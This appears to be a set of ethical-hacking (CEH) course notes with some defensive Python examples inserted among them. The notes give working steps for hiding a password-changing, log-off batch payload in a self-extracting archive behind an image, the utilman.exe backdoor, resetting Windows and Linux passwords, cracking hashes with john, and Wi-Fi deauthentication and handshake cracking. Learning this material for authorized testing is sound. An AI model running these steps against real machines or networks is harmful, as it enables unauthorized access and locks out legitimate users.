Uploaded by Muhammad Ali khan

CEH Basic Requirements

====================
Requirements
====================
1- Install Kali Linux
2- Linux Ubuntu/CentOS
3- Windows 7
4- Windows 10
Hint [don't install any tool in the base machine; do the labs inside virtual machines]
kali.org
download the Kali Linux live/installer image
===============
Linux structure
/etc = config files
/usr = software, applications
/var = variable data, e.g. logs in /var/log
/bin = user commands, /sbin = admin commands
/boot = operating system kernel (vmlinuz) and boot loader files
=====================
Kali basic commands
sudo passwd root = set the root password
mkdir [folder name] = to create a folder
touch [file name] = to create an empty file
cp [source] [destination] = to copy a file; mv [source] [destination] = to move (cut and paste) or rename a file/folder
rm = to remove/delete files (rm -r for a folder)
cp -r [folder] [destination] = to copy a folder with its contents
man [command] = to seek help, e.g. man useradd
useradd -g [group] [username] = to create a user with the given primary group
passwd [username] = to change a password; su [username] = to switch user
"x" in the password field of /etc/passwd = the hash is kept in /etc/shadow, not here
"more" = to read a file page by page
cat, less, head, tail, nl, view do the same with small differences
/etc/passwd = the list of users is here (one line per user: name:password:UID:GID:comment:home:shell)
check it: only root should have UID 0 (the "0:0" fields), so no other user should show those zeros, and every account should have "x" in the password field (an empty field means login with no password; anything else is a hash sitting in the world-readable passwd file)
/etc/shadow = has the password hashes of the users (readable by root only)
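The two /etc/passwd checks above, as an added Python example that is not part of the course notes. The passwd lines it runs on are constructed sample data with made-up account names; point it at a real file to audit a machine.

```python
"""Audit /etc/passwd lines for the two checks from the notes.

Added example, not from the course notes. SAMPLE_PASSWD is constructed data;
the user names in it are made up.
"""
import sys

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kali:x:1000:1000:Kali,,,:/home/kali:/usr/bin/zsh
backdoor:x:0:0:helper:/home/backdoor:/bin/bash
guest::1001:1001:Guest:/home/guest:/bin/sh
legacy:$6$salt$fakehash:1002:1002:Legacy:/home/legacy:/bin/sh
"""

# Password-field values that are normal in /etc/passwd: "x" (the hash lives
# in /etc/shadow) or a lock marker.
OK_PASSWORD_FIELDS = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Yield one dict per entry; lines without 7 fields get a 'malformed' key."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            yield {"line": lineno, "malformed": line}
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        yield {"line": lineno, "name": name, "pw": pw, "uid": uid,
               "gid": gid, "gecos": gecos, "home": home, "shell": shell}


def audit_passwd(text):
    """Return a list of (line, user, problem) for suspicious entries."""
    findings = []
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append((e["line"], "?", "line does not have 7 fields"))
            continue
        if not e["uid"].isdigit():
            findings.append((e["line"], e["name"], "non-numeric UID"))
        elif e["uid"] == "0" and e["name"] != "root":
            # Any UID-0 account is root under another name: the "multiple zeros" check.
            findings.append((e["line"], e["name"], "UID 0 account other than root"))
        if e["pw"] == "":
            findings.append((e["line"], e["name"], "empty password field: logs in without a password"))
        elif e["pw"] not in OK_PASSWORD_FIELDS:
            findings.append((e["line"], e["name"],
                             "password hash kept in world-readable /etc/passwd instead of /etc/shadow"))
    return findings


if __name__ == "__main__":
    # Usage: python passwd_audit.py [/etc/passwd]; with no argument the sample is used.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for line, user, problem in audit_passwd(data):
        print(f"line {line}: {user}: {problem}")
```

On the sample the script reports backdoor (second UID 0), guest (empty password field) and legacy (hash stored in passwd); a clean system returns nothing.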
vim = file editor
make changes, then press Esc and type :wq! to write and quit the file
linux shell = terminal; default shell on current Kali = zsh (also for root)
a normal user's shell may be sh, bash or zsh (see the last field of /etc/passwd)
you can change the shell with chsh; bash is also a shell
r w x = read, write, execute
folders owned by root (like /etc) are read-only for a normal user
chmod = to change the permissions
r = read a file / list a folder
w = write to a file / create and delete entries in a folder
x = execute a file / enter a folder
"x" permission on a folder = you can open (cd into) it
"x" permission on a file = code execution permission
normal folder permission for others is r-x
normal file permission for others is r--
u/g/o/a = user (owner) / group / others / all; + adds and - removes, e.g. chmod u+x script.sh
chmod a-r [file] = remove read permission for all users
./[file name] = to run a script in the current folder (needs the x permission)
$ is used to reference a variable, e.g. $HOME, $1
abc scripts by Deborah Shucart
apt-get install/list/remove/update/upgrade [software name] (Debian/Kali)
yum/dnf = the same on Red Hat/CentOS; dpkg -i [path/software.deb] = to install a local .deb
git clone [url] = to get a tool from its repository; Kali's tool list is at kali.org/tools
=======================
Lecture# 2
======================
1- Services
2- Ports
3- SSH
4- Apache
5- CEH Basic wording
7- Cryptography
Encryption/decryption
Hash/"dehash" (cracking by comparison)
Encode/decode
8- Steganography
hide an object/.bat/.sh/.exe... behind a pic/mp3/software
9- Homograph attacks
10- CIA
-------------------
11- Password break/crack
physical access
windows 7/8/10
.rar, .pdf
linux server
BIOS
Mobile
---------------------
12- Wireless password
Phishing [gmail/facebook]
------------------
services
- view the status of any service
- systemctl status/start/stop/enable/disable/restart [service-name]
- w = to check the list of logged-in users
** allow/block ssh to root: PermitRootLogin yes/no in /etc/ssh/sshd_config, then restart ssh
PORTS
- a port is the logical door of a service
- remember the well-known ports: SSH 22, SMB 445, SMTP 25, NTP 123, DNS 53, DHCP 67/68, RDP 3389, FTP 21, Telnet 23
- netstat = to check the state of listening ports
- netstat -antp = all TCP sockets, numeric, with PID/program name (run as root to see every process)
- webserver = apache/nginx
- dpkg --list | grep [name] = to check whether a package/service is installed
- systemctl start apache2 = starts the Apache service
- Apache serves /var/www/html by default
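A parser for netstat -antp output that lists what is exposed, as an added Python example that is not part of the course notes. The netstat text is constructed in the real output format; the PIDs and addresses are made up.

```python
"""Parse `netstat -antp` output and list services exposed on every interface.

Added example, not from the course notes. SAMPLE_NETSTAT is constructed text
in the netstat output format; PIDs and addresses are made up.
"""

SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd: /usr/sbin
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      901/mysqld
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      655/inetd
tcp        0      0 192.168.56.101:22       192.168.56.1:51234      ESTABLISHED 1203/sshd: kali
tcp6       0      0 :::80                   :::*                    LISTEN      977/apache2
udp        0      0 0.0.0.0:68              0.0.0.0:*                           700/dhclient
"""

# Well-known ports from the notes, plus a few that show up on every scan.
WELL_KNOWN = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "dns", 67: "dhcp",
              68: "dhcp-client", 80: "http", 123: "ntp", 139: "netbios", 445: "smb", 3389: "rdp"}
# Services that carry credentials in clear text and should not be listening at all.
CLEARTEXT = {21: "ftp", 23: "telnet"}
ANY_ADDR = {"0.0.0.0", "::", "*"}


def parse_netstat(text):
    """One dict per socket line; header lines are skipped."""
    rows = []
    for line in text.splitlines():
        if not line.startswith(("tcp", "udp")):
            continue
        parts = line.split(None, 6)          # program name may itself contain spaces
        if len(parts) < 5:
            continue
        proto, local = parts[0], parts[3]
        if proto.startswith("tcp"):
            state = parts[5] if len(parts) > 5 else ""
            program = parts[6] if len(parts) > 6 else ""
        else:                                 # UDP lines have no State column
            state = ""
            program = " ".join(parts[5:])
        addr, port = local.rsplit(":", 1)     # works for IPv6 ":::80" as well
        rows.append({"proto": proto, "addr": addr, "port": int(port),
                     "state": state, "program": program})
    return rows


def exposed_listeners(rows):
    """(port, service, program) for sockets bound to all interfaces."""
    out = []
    for r in rows:
        listening = r["state"] == "LISTEN" or r["proto"].startswith("udp")
        if listening and r["addr"] in ANY_ADDR:
            out.append((r["port"], WELL_KNOWN.get(r["port"], "unknown"), r["program"]))
    return sorted(out)


def cleartext_findings(rows):
    """Clear-text services listening anywhere, even on localhost."""
    return sorted({(r["port"], CLEARTEXT[r["port"]]) for r in rows
                   if r["state"] == "LISTEN" and r["port"] in CLEARTEXT})


if __name__ == "__main__":
    # Usage: netstat -antp | python netstat_audit.py   (or run as-is for the sample)
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NETSTAT
    rows = parse_netstat(text)
    for port, service, program in exposed_listeners(rows):
        print(f"{port:5d} {service:12s} {program}")
    for port, service in cleartext_findings(rows):
        print(f"WARNING: {service} on port {port} sends passwords in clear text")
```

Note what the sample shows: the MySQL listener on 127.0.0.1 is not reported as exposed, but the telnet listener is flagged regardless of where it is bound.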
CEH BASIC Wording
- vulnerability = a weakness that can be exploited
- types of hacker => white hat (authorized), black hat (criminal), grey hat (in between)
-------------------------
CRYPTO
- a password is always stored as a HASH, never as plain text
- the password hash value is the "cipher" form of the password
- TEXT to cipher
- weak: ahmad + 2-3 digits; stronger: Ahmad + cjicf@313 (mixed case, symbols, digits)
ENCRYPTION/DECRYPTION
-> used for data in transit and at rest (https/mail/messages/voice)
-> length is not fixed (depends on the length of the data)
-> 2-way method (text to cipher and back again)
-> needs a key: symmetric (one shared secret key) or asymmetric (public key to encrypt, private key to decrypt)
HASH/DEHASH
-> used for passwords / digital signatures / integrity checks
-> hash value is fixed in length (e.g. SHA-256 = 64 hex characters), whatever the input size
-> 1-way method: text -> hash; not convertible back to text
-> for any .pdf, .rar etc. we "break" the password by hashing guesses and comparing with the stored hash value
-> guessing from a wordlist is a dictionary attack; trying every possible combination is a brute-force attack
ENCODE/DECODE
-> used to represent data for transport/storage (e.g. base64, URL encoding), not for secrecy
-> length is not fixed
-> 2-way with no key at all: anyone can decode it
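The three transforms compared above, and the hash-and-compare loop used to recover a password, as an added Python example that is not part of the course notes. It uses only the standard library, so a one-time pad (XOR with a random key as long as the message) stands in for a real cipher; the passwords and wordlist are constructed.

```python
"""Encoding vs hashing vs encryption, and the dictionary attack from the notes.

Added example, not from the course notes. Standard library only: the one-time
pad stands in for a real cipher (use AES-GCM from a library such as
`cryptography` in practice). Passwords and the wordlist are constructed.
"""
import base64
import hashlib
import secrets
from typing import Iterable, Optional


# --- encode/decode: reversible, no key, no secrecy --------------------------
def encode_b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


def decode_b64(text: str) -> bytes:
    return base64.b64decode(text)


# --- hash: fixed length, one-way ---------------------------------------------
def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()     # always 64 hex characters


# --- encrypt/decrypt: reversible only with the key ---------------------------
def new_otp_key(length: int) -> bytes:
    return secrets.token_bytes(length)


def otp_xor(data: bytes, key: bytes) -> bytes:
    """One-time pad: XOR with a random key as long as the message.

    Output length equals input length (the "length depends on the data" point)
    and the same call with the same key decrypts. A pad key must never be reused.
    """
    if len(key) < len(data):
        raise ValueError("key must be at least as long as the data")
    return bytes(d ^ k for d, k in zip(data, key))


# --- "dehash": a hash cannot be inverted, only guessed and compared ----------
def dictionary_attack(target_hex: str, wordlist: Iterable[str], salt: bytes = b"") -> Optional[str]:
    """Hash each candidate (with the salt, if the password store used one) and compare.

    The notes call this brute force; strictly it is a dictionary attack, and
    brute force is the same loop run over every possible string.
    """
    target = target_hex.lower()
    for word in wordlist:
        if sha256_hex(salt + word.encode()) == target:
            return word
    return None


def summary() -> dict:
    """Apply all three transforms to one message and report what each gives back."""
    msg = b"Ahmad+cjicf@313"
    key = new_otp_key(len(msg))
    ct = otp_xor(msg, key)
    return {
        "b64_roundtrip": decode_b64(encode_b64(msg)) == msg,
        "hash_len_short": len(sha256_hex(b"a")),
        "hash_len_long": len(sha256_hex(b"a" * 100_000)),
        "cipher_len": len(ct),
        "decrypts_with_key": otp_xor(ct, key) == msg,
        "decrypts_with_wrong_key": otp_xor(ct, new_otp_key(len(msg))) == msg,
    }


if __name__ == "__main__":
    for k, v in summary().items():
        print(f"{k}: {v}")
    stored = sha256_hex(b"ahmad123")            # constructed stored hash
    print("cracked:", dictionary_attack(stored, ["letmein", "ahmad123", "qwerty"]))
```

The salted call in the test shows why real password stores add a per-user salt: the same wordlist fails until the attacker also knows the salt, and precomputed tables become useless.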
---------------------------
STEGANOGRAPHY
-> hiding malicious code behind a pic/file is steganography
-> copy /b mypic.jpeg+data.rar newpic.jpeg (Windows: /b = binary; the archive is appended after the image data, so the picture still opens and WinRAR still finds the archive)
- don't download random stego tools from the internet
- for execution of the code, change the archive to an SFX (self-extracting) archive in WinRAR
- go to Advanced -> SFX options; creating the attack file is easy, but convincing people to follow your instructions (social engineering) needs 99% of the effort
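The copy /b trick and its detection, as an added Python example that is not part of the course notes. The cover "images" are constructed byte strings that follow the JPEG marker layout (not real pictures) and the payload is a made-up blob carrying a RAR signature; the detector walks the JPEG structure rather than searching for the last end-of-image marker, because the appended data may contain that byte pair too.

```python
"""Hide a file behind a JPEG the `copy /b` way, and detect such appended data.

Added example, not from the course notes. COVER_* are constructed byte strings
that follow the JPEG marker layout but are not real images; PAYLOAD is a
made-up blob with a RAR signature.
"""
import struct

SOI, EOI, SOS = b"\xff\xd8", b"\xff\xd9", 0xDA
SIGNATURES = {b"Rar!\x1a\x07": "rar", b"PK\x03\x04": "zip", b"MZ": "exe", b"\x7fELF": "elf"}

# Minimal JPEG-like cover: SOI, one APP0 segment, EOI.
COVER_SIMPLE = SOI + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + EOI
# Cover with a scan: SOI, SOS header for one component, entropy data that
# contains a stuffed 0xFF00, then EOI.
COVER_WITH_SCAN = SOI + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00" + b"\x12\xff\x00\x34" + EOI
PAYLOAD = b"Rar!\x1a\x07\x00" + b"constructed archive body \xff\xd9 with a fake EOI inside"


def hide_after_image(cover: bytes, payload: bytes) -> bytes:
    """Equivalent of `copy /b cover.jpg+payload.rar out.jpg`: plain concatenation."""
    return cover + payload


def jpeg_end_offset(blob: bytes) -> int:
    """Walk the JPEG segments and return the offset just past the real EOI."""
    if not blob.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(blob):
        if blob[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = blob[pos + 1]
        if marker == 0xFF:                                  # fill byte
            pos += 1
            continue
        if marker == 0xD9:                                  # EOI
            return pos + 2
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:        # TEM / RSTn carry no length
            pos += 2
            continue
        if pos + 4 > len(blob):
            raise ValueError("truncated segment header")
        seglen = struct.unpack(">H", blob[pos + 2:pos + 4])[0]
        pos += 2 + seglen
        if marker == SOS:
            # Entropy-coded data: 0xFF is followed by 0x00 (stuffing) or an RSTn
            # marker; any other byte after 0xFF is the next real marker.
            while pos + 1 < len(blob):
                nxt = blob[pos + 1]
                if blob[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def appended_data(blob: bytes) -> bytes:
    """Bytes after the image proper; empty for a clean file."""
    return blob[jpeg_end_offset(blob):]


def classify(data: bytes) -> str:
    """Name the appended blob by its file signature."""
    if not data:
        return "none"
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return "unknown"


if __name__ == "__main__":
    # Usage: python jpeg_trailer.py picture.jpg   (or run as-is for the constructed sample)
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else hide_after_image(COVER_WITH_SCAN, PAYLOAD)
    extra = appended_data(blob)
    print(f"{len(extra)} bytes after EOI, type: {classify(extra)}")
```

Some cameras and editors append harmless trailers (thumbnails, metadata) after EOI, so the size and signature of the extra data decide whether a file deserves a closer look; a RAR, ZIP or PE signature there is the case the notes describe.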
- net user -> shows the list of users
- net user admin password -> changes the password of the "admin" user to "password"
- a normal CMD does not have admin rights
- need to run CMD as administrator and then run this command
winrar -> Advanced -> SFX options ->
**IEXPRESS (Windows tool that bundles a script into a self-extracting .exe)
- a script that shows a message, changes the user's password and logs them off:
@echo off
rem show a message to the current user
echo Hi dear %username%, your laptop is going off
rem change the current user's password to alikhan (needs admin rights)
net user %username% alikhan
rem log off the current session
shutdown /l
rem disconnect the terminal-services session
tsdiscon
-----------------
HOMOGRAPH ATTACK
- use look-alike names for a known domain...
login.com vs Iogin.com (capital i instead of l)
facebook.com vs faceboo.com
gmail.com vs gamoil.com
- this attack is linked with fake page hosting, phishing and social engineering
**netcraft (site/browser extension to check and report fake sites)
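A look-alike domain check for the examples above, as an added Python example that is not part of the course notes. The brand list, the confusable table and the tested domains are constructed; real tools such as dnstwist carry far larger tables and generate the candidates the other way round.

```python
"""Flag look-alike domains for a list of brands (homograph / typosquat check).

Added example, not from the course notes. BRANDS and the tested domains are
constructed; CONFUSABLES is a small hand-picked subset of real lookalikes.
"""
import unicodedata

BRANDS = ["login", "facebook", "gmail", "paypal"]

# Sequences that look alike in common fonts, plus Cyrillic letters that are
# drawn identically to Latin ones. Applied before lowercasing so that a
# capital I (which looks like l) is caught.
CONFUSABLES = [
    ("rn", "m"), ("vv", "w"), ("I", "l"), ("1", "l"), ("|", "l"), ("0", "o"),
    ("\u0430", "a"), ("\u0435", "e"), ("\u043e", "o"), ("\u0440", "p"), ("\u0441", "c"),
]


def skeleton(label: str) -> str:
    """Reduce a label to what the eye sees."""
    s = unicodedata.normalize("NFKC", label)
    for src, dst in CONFUSABLES:
        s = s.replace(src, dst)
    return s.lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain: str) -> str:
    """Second-level label: 'Iogin' from 'Iogin.com'. Case is kept on purpose."""
    parts = domain.strip().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def homograph_check(domain: str, brands=BRANDS, max_distance: int = 2):
    """Return (brand, reason) if the domain imitates a brand, else None."""
    label = registrable_label(domain)
    if label.lower() in brands:
        return None                              # the real brand name
    sk = skeleton(label)
    if sk in brands:
        return (sk, "confusable characters")
    best = min(brands, key=lambda b: levenshtein(sk, b))
    dist = levenshtein(sk, best)
    if dist <= max_distance:
        return (best, f"edit distance {dist}")
    return None


if __name__ == "__main__":
    for d in ["Iogin.com", "faceboo.com", "gamoil.com", "p\u0430ypal.com", "gmail.com", "example.com"]:
        print(f"{d:16s} -> {homograph_check(d)}")
```

Two kinds of imitation are separated here: the skeleton catches glyph substitutions (I for l, Cyrillic а for a) that no spelling check would see, and the edit distance catches the dropped or swapped letters of plain typosquatting. A low threshold keeps the false positives down; tune it per brand length.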
--------------
CIA
C -> confidentiality
I -> integrity (data/email/software...)
A -> availability
--------------
to verify the integrity of a downloaded file -> certutil.exe -hashfile [path of file] SHA256, then compare with the hash published by the vendor
installed Windows system file integrity check -> sfc /scannow
**check email integrity (sender headers, SPF/DKIM/DMARC authentication results)
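The download check above (hash the file, compare with the published value), as an added Python example that is not part of the course notes; it does what certutil -hashfile does and then the comparison the notes leave to the eye. The installer file and its "published" hash are constructed inside demo().

```python
"""Verify a downloaded file against a published SHA-256 and detect tampering.

Added example, not from the course notes. The installer file and its
"published" hash are constructed in demo().
"""
import hashlib
import hmac
import os
import tempfile


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash in chunks so a multi-gigabyte ISO does not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def verify_download(path: str, published: str):
    """Return (ok, actual_hex).

    Accepts the bare hex in either case or a full sha256sum line
    ("<hash>  filename"); the compare is constant-time out of habit.
    """
    expected = published.strip().split()[0].lower()
    actual = sha256_file(path)
    return hmac.compare_digest(actual, expected), actual


def demo():
    """Write a constructed installer, record its hash, flip one byte, re-check."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "installer.bin")
        with open(path, "wb") as f:
            f.write(b"constructed installer contents\n" * 50_000)   # ~1.5 MB: more than one chunk
        published = sha256_file(path) + "  installer.bin"          # sha256sum-style line
        ok_before, _ = verify_download(path, published)
        with open(path, "r+b") as f:                                # tamper with a single byte
            f.seek(12345)
            f.write(b"X")
        ok_after, _ = verify_download(path, published)
        return ok_before, ok_after


if __name__ == "__main__":
    print("clean file verifies:", demo()[0], "| tampered file verifies:", demo()[1])
```

The hash only proves the file matches what the publisher posted; if the hash was fetched from the same compromised page as the download, both can be swapped together, which is why vendors also sign the hash list (GPG) and why sfc compares against catalog signatures rather than a downloaded list.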
----------------
WINDOWS PASSWORD BREAK with PHYSICAL ACCESS
- the Ease of Access button on the logon screen runs utilman.exe as SYSTEM
- replace utilman.exe with cmd.exe (from a recovery/installer command prompt, inside Windows\System32)
- copy utilman.exe utilman.exe.copy  (back up the original first)
- copy cmd.exe cmd.exe.backup
- copy cmd.exe utilman.exe
------------------------
BREAK THE PASSWORD of windows using Linux
- run Kali Linux live
- boot it; it will show your Windows disk as a storage device
- attach (mount) it
- find its path
- go to its path
- go to Windows/System32/config, where the SAM hive with the Windows password hashes is stored
- use the Kali tool chntpw
chntpw -l SAM -> list the users
chntpw -u Admin SAM -> change/clear the password of the Admin user
-----------------------------
CRACK THE PASSWORD of windows using Linux
- run Kali Linux live
- boot it; it will show your Windows disk as a storage device
- attach (mount) it
- find its path
- go to its path
- go to Windows/System32/config, where the SAM and SYSTEM hives are stored
Tool to read the hash values -> recover the password from the hash -> dictionary/brute-force attack
- use the Kali tool samdump2 to dump the hashes from SAM (it needs the boot key from the SYSTEM hive, bkhive); ophcrack can do it too
- ophcrack is also a Kali tool
open it -> give the path of the SAM ->
it will provide the hash values
- use a password-cracking tool
john, hydra, medusa, brutex (hydra/medusa are for online logins; john works on hash files)
- john [hash file], e.g. john winhash.txt
----------------
crack a password using Windows
*- openwall.com/john/
- download the tool
- convert the .rar to a hash text file, as john only works on text input
- rar2john.exe CEH4.rar > ceh4hash.txt
- more ceh4hash.txt shows the hash value extracted from the file
- john ceh4hash.txt
------------------
BREAK PASSWORD OF LINUX
-**netcraft.com
Linux boot process
BIOS -> boot loader (GRUB) -> kernel -> services (systemd) -> login screen
- old emergency mode = runlevel 1 = single-user mode; now it is rd.break (a root shell in the initramfs, before the real root filesystem is mounted)
Target = rd.break without a password, with limited access
-- Run the machine in rd.break
- press any key during machine startup to stop the boot process at the GRUB menu
- press "E"
- write rd.break at the end of the kernel (linux) line and boot with Ctrl-X
- when Linux boots into the rd.break shell, continue with the steps below
=============
Lec 3
--------------
Linux Password
Booting sequence
1-> BIOS password / PROM (Sun SPARC servers have a PROM user/password at boot)
2-> boot loader: Windows = NTLDR (old) / bootmgr, Linux = GRUB [first stage of the OS = loads the kernel]
3-> kernel in /boot/
------------
Linux root password break from the boot loader (rd.break)
-> boot
-> stop at the boot loader stage
-> press "E"
-> edit the kernel startup line
-> enter rd.break at the end and boot
-> after it loads, enter: mount -o remount,rw /sysroot
-> chroot /sysroot
-> passwd root (set the new password)
-> if you change a password from rd.break, SELinux will not let you log in on CentOS and Red Hat Linux, because /etc/shadow was rewritten without its security label
-> for this either relabel (touch /.autorelabel before rebooting) or stop SELinux:
-> /etc/sysconfig/selinux
-> vim -> edit the file (SELINUX=permissive or disabled)
-> press Escape -> :wq!
-> this is the easy way to break a Linux password
------------------
* Secure the boot loader: protect GRUB editing with a password (grub2-setpassword on RHEL/CentOS, i.e. password_pbkdf2 in the GRUB config)
** rd.break without a password = GRUB = /boot/grub2/grub.cfg ** Kali password break
--------------------
wireless password breaking
-> need an external card [wireless card that supports monitor mode]
-> if not, and you want to use the laptop's own adapter, boot Kali live from USB so it gets the card directly
-> install the extension pack in VirtualBox (for USB passthrough)
-> attach the card to the Linux VM
-> boot Linux
-> iwconfig -> to view the wireless working mode
managed mode means it can be used to connect to any wireless network
-> change the wireless working mode from managed to monitor mode
-> the packets in which a client proves the password to the AP are called the 4-way handshake
-> need to capture the handshake: it carries values derived from the password (not the password itself), which the cracker tests guesses against
** aircrack-ng suite
-> airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
airmon-ng check kill -> stop the processes that interfere with monitor mode (airmon-ng check only lists them)
step-1 airmon-ng start/stop wlan0 -> to start/stop monitor mode (creates wlan0mon)
step-2 iwconfig -> to verify the working mode of the wireless card
step-3 airodump-ng wlan0mon -> to sniff the packets
it will give details of the surrounding wireless networks (BSSID, channel, clients)
step-4 airodump-ng --bssid (specific BSSID) -c (its channel) wlan0mon
step-5 airodump-ng --bssid (specific BSSID) -c (channel) -w /path/filename wlan0mon (to save the capture)
step-6 forcefully disconnect a client so it re-initiates the 4-way handshake
step-7 aireplay-ng -> to deauthenticate the connected users of an SSID
aireplay-ng --deauth 10 -a (MAC of the AP) -c (MAC of the client) wlan0mon
step-9 stop the capture once airodump-ng shows "WPA handshake" in its top line
go to the file path
open the .cap file
step-10 apply the eapol filter in Wireshark to see the 4 handshake messages
step-11 aircrack-ng -> dictionary attack on the capture: aircrack-ng redpkt-01.cap -w /usr/share/dict/words
==> if you want to use john, convert the capture file to a hash text file
the .cap file cannot be converted to text directly
aircrack-ng -J zhash redpkt-01.cap -> writes zhash.hccap; hccap2john zhash.hccap > zhash.txt
john zhash.txt
Wireless Hacking
Phishing
phishing tools
set (Social-Engineer Toolkit, setoolkit on Kali)
-- nexphish -> phishing tool
locate nexphish
github.com
------------------------
ip spoofing / anonymity
-> tor
Download